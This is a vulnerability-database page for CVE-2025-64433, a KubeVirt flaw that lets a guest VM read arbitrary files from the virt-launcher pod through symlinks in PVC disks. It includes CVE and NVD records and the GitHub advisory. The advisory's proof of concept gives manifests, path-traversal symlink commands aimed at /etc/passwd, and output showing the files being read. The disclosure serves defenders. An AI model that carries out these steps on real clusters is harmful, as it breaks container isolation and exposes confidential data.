Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64433 (GCVE-0-2025-64433)
Vulnerability from cvelistv5 – Published: 2025-11-07 23:07 – Updated: 2025-11-10 16:52- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64433",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T16:51:41.662422Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T16:52:41.772Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.3"
},
{
"status": "affected",
"version": "\u003e= 1.6.0-alpha.0, \u003c 1.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T23:07:31.434Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08"
}
],
"source": {
"advisory": "GHSA-qw6q-3pgr-5cwq",
"discovery": "UNKNOWN"
},
"title": "KubeVirt Arbitrary Container File Read"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64433",
"datePublished": "2025-11-07T23:07:31.434Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T16:52:41.772Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64433\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:45.537\",\"lastModified\":\"2025-11-25T16:49:00.340\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Versiones anteriores a 1.5.3 y 1.6.1, se descubri\u00f3 una vulnerabilidad que permite a una VM leer archivos arbitrarios del sistema de archivos del pod virt-launcher. Este problema se deriva del manejo inadecuado de enlaces simb\u00f3licos al montar discos PVC en una VM. Espec\u00edficamente, si un usuario malicioso tiene control total o parcial sobre el contenido de un PVC, puede crear un enlace simb\u00f3lico que apunte a un archivo dentro del sistema de archivos del pod virt-launcher. Dado que libvirt puede tratar archivos regulares como dispositivos de bloque, cualquier archivo en el sistema de archivos del pod que est\u00e9 enlazado simb\u00f3licamente de esta manera puede montarse en la VM y, posteriormente, leerse. Aunque existe un mecanismo de seguridad donde las VMs se ejecutan como un usuario sin privilegios con UID 107 dentro del contenedor virt-launcher, lo que limita el alcance de los recursos accesibles, esta restricci\u00f3n se elude debido a una segunda vulnerabilidad. Esta \u00faltima provoca que la propiedad de cualquier archivo destinado a ser montado se cambie al usuario sin privilegios con UID 107 antes del montaje. Como resultado, un atacante puede obtener acceso y leer archivos arbitrarios ubicados dentro del sistema de archivos del pod virt-launcher o en un PVC montado desde dentro de la VM invitada. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"1.5.3\",\"matchCriteriaId\":\"D06A16D0-A19D-4FC9-BBB2-DD155157AD8E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"7AC531A2-1D99-4F6E-8C95-57B3B6B15681\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:alpha0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"DD76B774-EB47-4714-8235-D006EC603FDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:beta0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"849F4551-D37E-40C3-A49D-AF2A9BA9CC8A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"3A5C8C2B-705D-435E-93A7-0523DC4A97BE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"A6326DB3-2CBC-4B85-94C8-9F2B2B458548\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64433\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T16:51:41.662422Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T16:52:28.061Z\"}}], \"cna\": {\"title\": \"KubeVirt Arbitrary Container File Read\", \"source\": {\"advisory\": \"GHSA-qw6q-3pgr-5cwq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0-alpha.0, \u003c 1.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/09eafa068ec01eca0e96ebafeeb9522a878dbf64\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/9dc798cb1efe924a9a2b97b6e016452dec5e3849\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/a81b27d4600cf654274dd197119658382affdb08\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T23:07:31.434Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64433\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T16:52:41.772Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T23:07:31.434Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-QW6Q-3PGR-5CWQ
Vulnerability from github – Published: 2025-11-06 23:33 – Updated: 2025-11-17 21:41Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the virt-launcher pod. This is due to erroneous handling of symlinks defined within a PVC.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
A vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod's file system. Since libvirt can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.
Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod's file system or on a mounted PVC from within the guest VM.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Consider that an attacker has control over the contents of two PVC (e.g., from within a container) and creates the following symlinks:
# The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: pvc-arbitrary-container-read-1
spec:
accessModes:
- ReadWriteMany # suitable for migration (:= RWX)
resources:
requests:
storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: pvc-arbitrary-container-read-2
spec:
accessModes:
- ReadWriteMany # suitable for migration (:= RWX)
resources:
requests:
storage: 500Mi
---
# The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
name: dual-pvc-pod
spec:
containers:
- name: app-container
image: alpine
command: ["/some-vulnerable-app"]
volumeMounts:
- name: pvc-volume-one
mountPath: /mnt/data1
- name: pvc-volume-two
mountPath: /mnt/data2
volumes:
- name: pvc-volume-one
persistentVolumeClaim:
claimName: pvc-arbitrary-container-read-1
- name: pvc-volume-two
persistentVolumeClaim:
claimName: pvc-arbitrary-container-read-2
By default, Minikube's storage controller (hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:
# Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.
attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx 1 root root 85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml
# With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx 1 root root 34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd
Of course, these links could potentially be broken as the files, especially default_arbitrary-container-read.xml, could not exist on the dual-pvc-pod pod's file system. The attacker then deploy the following VM:
# arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
name: arbitrary-container-read
spec:
runStrategy: Always
template:
metadata:
labels:
kubevirt.io/size: small
kubevirt.io/domain: arbitrary-container-read
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: pvc-1
disk:
bus: virtio
- name: pvc-2
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
interfaces:
- name: default
masquerade: {}
resources:
requests:
memory: 64M
networks:
- name: default
pod: {}
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: pvc-1
persistentVolumeClaim:
claimName: pvc-arbitrary-container-read-1
- name: pvc-2
persistentVolumeClaim:
claimName: pvc-arbitrary-container-read-2
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
The two PVCs will be mounted as volumes in "filesystem" mode:
From the documentation of the different volume modes, one can infer that if the backing disk.img is not owned by the unprivileged user with UID 107, the VM should fail to mount it. In addition, it's expected that this backing file is in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of virt-launcher is not the expected behaviour. Below is demonstrated that after applying the VM manifest, the guest can read the /etc/passwd and default_migration.xml files from the virt-launcher pod's file system:
# Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created
# Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME AGE PHASE IP NODENAME READY
arbitrary-container-read 80s Running 10.244.1.9 minikube-m02 True
# Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read
# Within the `arbitrary-container-read` VM, inspect the available block devices
root@arbitrary-container-read:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 253:0 0 44M 0 disk
|-vda1 253:1 0 35M 0 part /
-vda15 253:15 0 8M 0 part
vdb 253:16 0 20K 0 disk
vdc 253:32 0 512B 0 disk
vdd 253:48 0 1M 0 disk
# Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash
# Inspect the mounted `default_migration.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
<monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
<vcpus>
</vcpus>
<qemuCaps>
<flag name='hda-duplex'/>
<flag name='piix3-usb-uhci'/>
<flag name='piix4-usb-uhci'/>
<flag name='usb-ehci'/>
<flag name='ich9-usb-ehci1'/>
<flag name='usb-redir'/>
<flag name='usb-hub'/>
<flag name='ich9-ahci'/>
operator@minikube:~$ kubectl get pods
NAME READY STATUS RESTARTS AGE
dual-pvc-pod 1/1 Running 0 20m
virt-launcher-arbitrary-container-read-tn4mb 3/3 Running 0 15m
# Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash
# Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan 1 1970 /etc/passwd
Impact
What kind of vulnerability is it? Who is impacted?
This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0-alpha.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64433"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:33:33Z",
"nvd_published_at": "2025-11-07T23:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nMounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the `virt-launcher` pod. This is due to erroneous handling of symlinks defined within a PVC.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nA vulnerability was discovered that allows a VM to read arbitrary files from the `virt-launcher` pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the `virt-launcher` pod\u0027s file system. Since `libvirt` can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read.\n\nAlthough a security mechanism exists where VMs are executed as an unprivileged user with UID `107` inside the `virt-launcher` container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID `107` prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the `virt-launcher` pod\u0027s file system or on a mounted PVC from within the guest VM.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nConsider that an attacker has control over the contents of two PVC (e.g., from within a container) and creates the following symlinks:\n\n```yaml\n# The YAML definition of two PVCs that the attacker has access to\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: pvc-arbitrary-container-read-1\nspec:\n accessModes:\n - ReadWriteMany # suitable for migration (:= RWX)\n resources:\n requests:\n storage: 500Mi\n---\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: pvc-arbitrary-container-read-2\nspec:\n accessModes:\n - ReadWriteMany # suitable for migration (:= RWX)\n resources:\n requests:\n storage: 500Mi\n---\n# The attacker-controlled container used to create the symlinks in the above PVCs\napiVersion: v1\nkind: Pod\nmetadata:\n name: dual-pvc-pod\nspec:\n containers:\n - name: app-container\n image: alpine\n command: [\"/some-vulnerable-app\"]\n volumeMounts:\n - name: pvc-volume-one\n mountPath: /mnt/data1\n - name: pvc-volume-two\n mountPath: /mnt/data2\n volumes:\n - name: pvc-volume-one\n persistentVolumeClaim:\n claimName: pvc-arbitrary-container-read-1\n - name: pvc-volume-two\n persistentVolumeClaim:\n claimName: pvc-arbitrary-container-read-2\n```\n\nBy default, Minikube\u0027s storage controller (`hostpath-provisioner`) will allocate the claim as a directory on the host node (`HostPath`). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:\n\n```bash\n# Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.\n\nattacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img\nattacker@dual-pvc-pod:/mnt/data1 $ls -l\nlrwxrwxrwx 1 root root 85 May 19 22:24 disk.img -\u003e ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml\n\n# With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM\nattacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img \nattacker@dual-pvc-pod:/mnt/data2 $ls -l\nlrwxrwxrwx 1 root root 34 May 19 22:26 disk.img -\u003e ../../../../../../../../etc/passwd\n```\n\nOf course, these links could potentially be broken as the files, especially `default_arbitrary-container-read.xml`, could not exist on the `dual-pvc-pod` pod\u0027s file system. The attacker then deploy the following VM:\n\n```yaml\n# arbitrary-container-read.yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n name: arbitrary-container-read\nspec:\n runStrategy: Always\n template:\n metadata:\n labels:\n kubevirt.io/size: small\n kubevirt.io/domain: arbitrary-container-read\n spec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: pvc-1\n disk:\n bus: virtio\n - name: pvc-2\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n interfaces:\n - name: default\n masquerade: {}\n resources:\n requests:\n memory: 64M\n networks:\n - name: default\n pod: {}\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: pvc-1\n persistentVolumeClaim:\n claimName: pvc-arbitrary-container-read-1\n - name: pvc-2\n persistentVolumeClaim:\n claimName: pvc-arbitrary-container-read-2\n - name: cloudinitdisk\n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\nThe two PVCs will be mounted as volumes in \"filesystem\" mode: \n\nFrom the [documentation](https://kubevirt.io/user-guide/storage/disks_and_volumes/#persistentvolumeclaim) of the different volume modes, one can infer that if the backing `disk.img` is not owned by the unprivileged user with UID `107`, the VM should fail to mount it. In addition, it\u0027s expected that this backing file is in [RAW format](https://www.qemu.org/docs/master/tools/qemu-img.html#notes). While this format can contain pretty much anything, we consider that being able to mount a file from the file system of `virt-launcher` is not the expected behaviour. Below is demonstrated that after applying the VM manifest, the guest can read the `/etc/passwd` and `default_migration.xml` files from the `virt-launcher` pod\u0027s file system: \n\n```bash\n# Deploy the VM manifest\noperator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml\nvirtualmachine.kubevirt.io/arbitrary-container-read created\n# Observe the deployment status\noperator@minikube:~$ kubectl get vmis\nNAME AGE PHASE IP NODENAME READY\narbitrary-container-read 80s Running 10.244.1.9 minikube-m02 True\n# Initiate a console connection to the running VM\noperator@minikube:~$ virtctl console arbitrary-container-read\n```\n\n```bash\n# Within the `arbitrary-container-read` VM, inspect the available block devices\nroot@arbitrary-container-read:~$ lsblk\nNAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT\nvda 253:0 0 44M 0 disk\n|-vda1 253:1 0 35M 0 part /\n-vda15 253:15 0 8M 0 part\nvdb 253:16 0 20K 0 disk\nvdc 253:32 0 512B 0 disk\nvdd 253:48 0 1M 0 disk\n# Inspect the mounted /etc/passwd of the `virt-launcher` pod\nroot@arbitrary-container-read:~$ cat /dev/vdc\nqemu:x:107:107:user:/home/qemu:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\n# Inspect the mounted `default_migration.xml` of the `virt-launcher` pod\nroot@arbitrary-container-read:~$ cat /dev/vdb | head -n 20\n\u003c!--\nWARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE\nOVERWRITTEN AND LOST. Changes to this xml configuration should be made using:\n virsh edit default_arbitrary-container-read\nor other application using the libvirt API.\n--\u003e\n\u003cdomstatus state=\u0027paused\u0027 reason=\u0027starting up\u0027 pid=\u002780\u0027\u003e\n \u003cmonitor path=\u0027/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock\u0027 type=\u0027unix\u0027/\u003e\n \u003cvcpus\u003e\n \u003c/vcpus\u003e\n \u003cqemuCaps\u003e\n \u003cflag name=\u0027hda-duplex\u0027/\u003e\n \u003cflag name=\u0027piix3-usb-uhci\u0027/\u003e\n \u003cflag name=\u0027piix4-usb-uhci\u0027/\u003e\n \u003cflag name=\u0027usb-ehci\u0027/\u003e\n \u003cflag name=\u0027ich9-usb-ehci1\u0027/\u003e\n \u003cflag name=\u0027usb-redir\u0027/\u003e\n \u003cflag 